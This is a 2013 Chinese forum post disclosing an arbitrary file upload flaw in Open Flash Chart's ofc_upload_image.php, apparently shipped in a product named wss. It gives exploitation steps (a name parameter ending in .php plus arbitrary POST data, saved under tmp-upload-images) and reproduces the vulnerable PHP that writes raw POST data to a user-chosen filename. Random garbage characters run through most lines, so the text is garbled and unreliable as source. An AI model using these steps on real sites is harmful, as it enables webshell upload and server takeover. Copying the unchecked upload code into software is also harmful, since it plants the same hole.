POST 数据漏洞文件执行任意后缀文件保存' ^" Y+ a; o, F8 A% @# `
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
" c( x; k1 u f. E/ r4 y* a7 \+ ^5 R) [+ y {
利用:
9 @4 l8 R1 T( t7 q5 l$ P# r/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名9 G* ?/ F3 o% c1 h
8 p& n/ @9 V: G+ n; L- g- DPost任意数据" K, ~; b8 h2 W) [) M! \
保存位置http://localhost/chart/tmp-upload-images/hfy.php
1 z- \! r, _, D0 C* a
8 `2 |* K0 y; r1 L6 j; |% g- U: r) I* D9 f9 N$ O
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
& u5 I, g2 c) Z2 Y
+ D4 j! Z/ R. l5 i c, g% S9 ?7 i) U<?php" r: X& V K, {* e
& |% i9 l& Z1 q//+ x6 n2 F2 d+ z. b: ^; [5 _4 m8 D
// In Open Flash Chart -> save_image debug mode, you
# J* A. f& x* X2 z& s2 n// will see the 'echo' text in a new window.
9 [ |4 q5 c: h, L, @ t( z- P//5 X9 p7 W9 t$ S5 v
0 q7 m( l; d0 W' }5 A$ Z' Y
/*
( b; |0 d1 r! m# l
9 E \5 i8 \$ ]: j, s8 b6 kprint_r( $_GET );
. d+ ]* }& a0 p0 x, |print_r( $_POST );% g) {6 @ @, y: ? b$ j5 Q
print_r( $_FILES );2 K2 _9 i# U. F1 B; U( C% f9 f# u7 U j
1 n/ `2 _( p6 A4 V) d7 sprint_r( $GLOBALS );! y b/ |7 n/ z1 t
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
1 p% N) @0 D1 ]5 p+ \8 q& y' q2 s/ c+ q C5 O" T- @! L, u ^5 l
*/
9 G% U' O* R. e$ b s+ r2 t// default path for the image to be stored //
2 R1 N" ]. _/ n: O$default_path = '../tmp-upload-images/';
: \; ^' ^# E1 r9 u3 b4 v* ?6 L/ O1 b
if (!file_exists($default_path)) mkdir($default_path, 0777, true);( h, U6 E" I9 v5 N& \0 Q/ d
1 S% O" K8 Y4 x9 E
// full path to the saved image including filename //2 m% C7 i1 q% }
$destination = $default_path . basename( $_GET[ 'name' ] ); 9 f2 f/ _& G. R
. X( S5 {( ~) ~5 Q4 m3 K$ b% V! hecho 'Saving your image to: '. $destination;
7 d" M" D( P7 j5 {" G3 B/ _// print_r( $_POST );
/ _6 w0 L2 F `5 }8 E. o9 Z// print_r( $_SERVER );. ~9 e7 B& ~: G, p. C' U
// echo $HTTP_RAW_POST_DATA;
4 _9 t0 _: I% G- b6 ]3 j. w# R7 H# z( H3 m4 Z
//
( q+ Q9 i4 i( o! h" |// POST data is usually string data, but we are passing a RAW .png% e! {' ~5 v; A( z. R, [
// so PHP is a bit confused and $_POST is empty. But it has saved
' f6 P0 h; L7 S' |// the raw bits into $HTTP_RAW_POST_DATA
# ?6 l4 g$ s. [6 {; K- R7 E//
% k6 j4 U- w, G, w2 S O8 C$ V: M; }1 S$ ]; ?
$jfh = fopen($destination, 'w') or die("can't open file");
* I6 q0 A( Y/ W. n* g5 Pfwrite($jfh, $HTTP_RAW_POST_DATA);* b$ U* u e8 ^; w- \0 k! R+ D, ]( {
fclose($jfh);7 f/ E0 m4 h' k2 H' H; `+ r' R
# v( Y- c- E/ V: k# f3 l8 m//' x& x1 t; r" E# F- ]; A
// LOOK:
0 `+ ^( x- e9 c2 Y+ o$ T//" c% v1 F& e3 `" Y
exit();
; R: f+ r$ h' H2 P% v//5 T" ]- u: H- g5 ?1 s7 `- H" j- A
// PHP5:6 A: U" k, u8 X P8 @6 m* f6 c
/// z. X) m7 A( w6 F- D
4 r$ Y; K: u( Q6 p- Q: u# [% _$ [
, d" P5 p+ z' o$ R! t8 U* X& u
// default path for the image to be stored //
4 v9 Y _1 \, n$default_path = 'tmp-upload-images/';2 k: Z, g2 X6 s) _
6 G8 F7 V; E6 H3 Q. A- Y _
if (!file_exists($default_path)) mkdir($default_path, 0777, true);1 h& _' a" z9 `. {/ m3 i5 M. f
! [7 c: \4 Z' B0 R L* T
// full path to the saved image including filename //
! g, ? ]! y2 c$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
9 c+ C0 V7 ]$ i; `
4 V) j& l& @5 j6 n// move the image into the specified directory //
+ N3 x$ b: ?% O, }9 W; Eif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {/ y& e K$ a6 [/ a7 ~
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
" f. l1 C" L f/ T0 q} else {
: x: W$ t" j. u' ^, L/ P echo "FILE UPLOAD FAILED";& p _) ]1 F" _
}
. }6 W. I. t9 l0 T6 n$ c3 B: S5 X7 i2 }$ @ s
6 F. i6 e7 [. u0 b) e2 ]?># w2 ^ ]$ @+ q: ~: Z
- r) |3 v/ D) ]% E+ ]7 m! j5 E
* b( S) D1 X4 [
5 }) G/ S* x5 \- g, v: x* d f
: u2 |7 F8 ], \
* r) i& G/ Q5 ~' Q% p( h
9 U; U0 \( R: q6 X4 Y+ N- W6 X& ~- ]% C修复方案:
' {5 x9 i( \, m这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
# q- t! p3 p$ L5 s. n3 H. P, D) q3 a; K
! l: K+ a( }: ?7 ?( Y
2 a" M$ n) U: V1 ]% N
' x( E& {) L! h6 Z- H
|
发表于 2013-2-23 12:38:58
收藏
支持
反对